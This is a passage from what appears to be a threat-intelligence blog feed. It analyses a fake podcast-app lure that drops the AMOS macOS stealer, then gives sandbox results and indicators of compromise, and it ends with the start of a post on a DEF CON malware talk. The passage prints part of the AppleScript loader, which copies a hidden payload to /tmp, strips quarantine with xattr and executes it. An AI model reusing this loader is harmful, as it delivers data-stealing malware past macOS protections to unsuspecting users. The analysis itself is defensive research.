    end try
    if targetDisk is "" then
        return
    end if
    set folderPath to "/Volumes/" &amp; targetDisk &amp; "/"
    set appName to ".Huddle"
    set appPath to folderPath &amp; appName
    set tempAppPath to "/tmp/" &amp; appName
    try
        do shell script "rm -f " &amp; quoted form of tempAppPath
    end try
    try
        do shell script "cp " &amp; quoted form of appPath &amp; " " &amp; quoted form of tempAppPath
    end try
    try
        do shell script "xattr -c " &amp; quoted form of tempAppPath
    end try
    try
        do shell script "chmod +x " &amp; quoted form of tempAppPath
    end try
    try
        do shell script quoted form of tempAppPath
    end try
end run'</code></pre><p>This AppleScript does the following:</p><ul><li><p>Lists mounted disks and looks for a volume name matching the lure, for example <strong>Huddle</strong> or <strong>Streamyard</strong>.</p></li><li><p>Builds a path to a hidden file on that volume, .<strong>Huddle</strong> or .<strong>Streamyard</strong>.</p><ul><li><p>The initial dot (.) indicates a hidden file or directory on Unix systems.</p></li></ul></li><li><p>Copies that file to <em>/tmp/</em> as <em>/tmp/.Huddle</em> or <em>/tmp/.Streamyard</em>.</p></li><li><p>Clears extended attributes with <em>xattr -c</em> to remove quarantine.</p></li><li><p>Marks it executable with <em>chmod +x</em>.</p></li><li><p>Executes the copied payload from <em>/tmp</em>.</p></li></ul><p>And what exactly are those hidden files, .Huddle and .Streamyard? Those are the AMOS samples, which we are not running for&#8230; safety reasons.</p><p>But we know someone who will gladly detonate them: the <strong>CrowdStrike Sandbox</strong>.</p><p>Wear your safety goggles. We are going to blow things up.</p><div><hr></div><h2>Detonating AMOS Stealer</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!CLGg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!CLGg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png 424w, https://substackcdn.com/image/fetch/$s_!CLGg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png 848w, https://substackcdn.com/image/fetch/$s_!CLGg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!CLGg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!CLGg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png" width="538" height="358.78983516483515" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/abb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:971,&quot;width&quot;:1456,&quot;resizeWidth&quot;:538,&quot;bytes&quot;:3289445,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/173846074?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!CLGg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png 424w, https://substackcdn.com/image/fetch/$s_!CLGg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png 848w, https://substackcdn.com/image/fetch/$s_!CLGg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!CLGg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fabb8c26c-17dd-496c-ac07-43dd98915d24_1536x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We submit both the Loader and the sample for detonation to see how they behave individually.</p><p>As expected, the loader itself can&#8217;t do much without the final AMOS payload. It merely prepares the environment and then waits for something that never arrives. Still, we can take a look at how it works and what it does to set the stage for its partner in crime.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BZ9f!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BZ9f!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png 424w, https://substackcdn.com/image/fetch/$s_!BZ9f!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png 848w, https://substackcdn.com/image/fetch/$s_!BZ9f!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png 1272w, https://substackcdn.com/image/fetch/$s_!BZ9f!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BZ9f!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png" width="679" height="341.36538461538464" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:732,&quot;width&quot;:1456,&quot;resizeWidth&quot;:679,&quot;bytes&quot;:427973,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/173846074?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BZ9f!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png 424w, https://substackcdn.com/image/fetch/$s_!BZ9f!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png 848w, https://substackcdn.com/image/fetch/$s_!BZ9f!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png 1272w, https://substackcdn.com/image/fetch/$s_!BZ9f!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f8acf68-c42f-43b2-87eb-ce9aee3033ad_2846x1430.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>On the other hand, the sample itself fires up all alerts on the platform. Every behavioural sensor, network indicator and file operation gets flagged, making it crystal clear that the payload is malicious. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!IxvX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!IxvX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png 424w, https://substackcdn.com/image/fetch/$s_!IxvX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png 848w, https://substackcdn.com/image/fetch/$s_!IxvX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png 1272w, https://substackcdn.com/image/fetch/$s_!IxvX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!IxvX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png" width="515" height="395.8001373626374" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1119,&quot;width&quot;:1456,&quot;resizeWidth&quot;:515,&quot;bytes&quot;:204860,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/173846074?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!IxvX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png 424w, https://substackcdn.com/image/fetch/$s_!IxvX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png 848w, https://substackcdn.com/image/fetch/$s_!IxvX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png 1272w, https://substackcdn.com/image/fetch/$s_!IxvX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81367c1b-d67f-46a3-ad5d-5a433df8f502_1782x1370.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>That is actually good news: while the loader tries to be subtle, the final AMOS sample leaves enough noise to be reliably caught in a sandboxed environment.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!nx0G!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!nx0G!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png 424w, https://substackcdn.com/image/fetch/$s_!nx0G!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png 848w, https://substackcdn.com/image/fetch/$s_!nx0G!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png 1272w, https://substackcdn.com/image/fetch/$s_!nx0G!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!nx0G!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png" width="680" height="351.6758241758242" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:753,&quot;width&quot;:1456,&quot;resizeWidth&quot;:680,&quot;bytes&quot;:361040,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/173846074?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!nx0G!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png 424w, https://substackcdn.com/image/fetch/$s_!nx0G!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png 848w, https://substackcdn.com/image/fetch/$s_!nx0G!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png 1272w, https://substackcdn.com/image/fetch/$s_!nx0G!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8642f78f-9f49-4431-90ee-f3ba03c3ed0c_2836x1466.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In short, the stealth ends as soon as the real stealer steps in and thanks to that, we can trace its actions, extract IOCs and turn this fake podcast into actionable defence.</p><p>It&#8217;s time to stop the recording, send the raw tape to the producers, and dismiss today&#8217;s host: <strong>AMOS</strong> <strong>Stealer</strong>.</p><p>As always, do your own research, stay safe, and don&#8217;t get <em>rekdt</em>.</p><div><hr></div><h2>IOCs</h2><pre><code>URL:https://streamyard.ai
SHA256:69b859db7397a04bb1f1c2ff9d987686b5ce0c64ec8fc716c783ed6dd755e291
SHA256:c275252592228b51b3934a9b3932d269c2f9132caad5f51ae54216ec147a8834&#9;&#9;
URL:https://x.com/BillyBitcoins
Domain:streamyard.ai
Domain:huddle01.com
URL:https://huddle01.com
SHA256:f7d138a4fa15215c4e747449f31b2b6b6726aed00a9cc9e3ec830df366c1437f&#9;&#9;&#9;SHA256:af4ba47f760ae08bce49c7b7c16e9dcff7df7eff53f27abc0c2a1eee1cea6085&#9;&#9;&#9;FilePath:Huddle.Iwv
FilePath:Streamyard.ZTz
SHA256:9665dac619c7d17a2fafd32f2df77f27dc39135d31235a748bd95ac137005e9b&#9;&#9;&#9;
SHA256:f7fe593806aa2b2486e2052c582b1b8423b2455bf9392fa42b1d2cb6d98ca897</code></pre><div><hr></div><h2>References</h2><ul><li><p><a href="https://otx.alienvault.com/pulse/68c99d5ca31f8adcc38d0637">Quetzal Team Intelligence Pulse on OTX</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[Quetzal at DEF CON 33]]></title><description><![CDATA["More Fungible Threats" at Data Duplication Village]]></description><link>https://quetzal.bitso.com/p/quetzal-at-def-con-33</link><guid isPermaLink="false">https://quetzal.bitso.com/p/quetzal-at-def-con-33</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Tue, 02 Sep 2025 17:02:04 GMT</pubDate><enclosure url="https://substackcdn.com/image/youtube/w_728,c_limit/rJzUDcmrqV8" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Can you get hacked via your calendar?</h2><p>Malicious software reinvents itself <em>every day</em>, breaking down its components to the bare minimum or hiding its traffic in the most unexpected places, like DNS records.</p><p>We decided to take it a step further and created <strong>MFT</strong>, a malware strain that abuses distributed systems like <strong>Codex</strong>, <strong>Cloudflare R2 buckets</strong>, <strong>IPFS</strong> and even <strong>Google Calendar</strong>,<strong> </strong>to demonstrate how far this can go.</p><p>To the outside world, all traffic seems to originate from reputable, legitimate services, but behind the curtain, something far more evil is going on.</p><p>Here&#8217;s our talk at the <strong>Data Duplication Village</strong> at <strong>DEF CON 33</strong>, hope you enjoy it!</p><div id="youtube2-rJzUDcmrqV8" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;rJzUDcmrqV8&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/rJzUDcmrqV8?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><div><hr></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jsVn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jsVn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!jsVn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jsVn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic" width="119" height="119" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1280,&quot;width&quot;:1280,&quot;resizeWidth&quot;:119,&quot;bytes&quot;:73912,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/172519068?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!jsVn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc482c4c9-7bac-428b-a796-73b7797acbce_1280x1280.heic 424w, 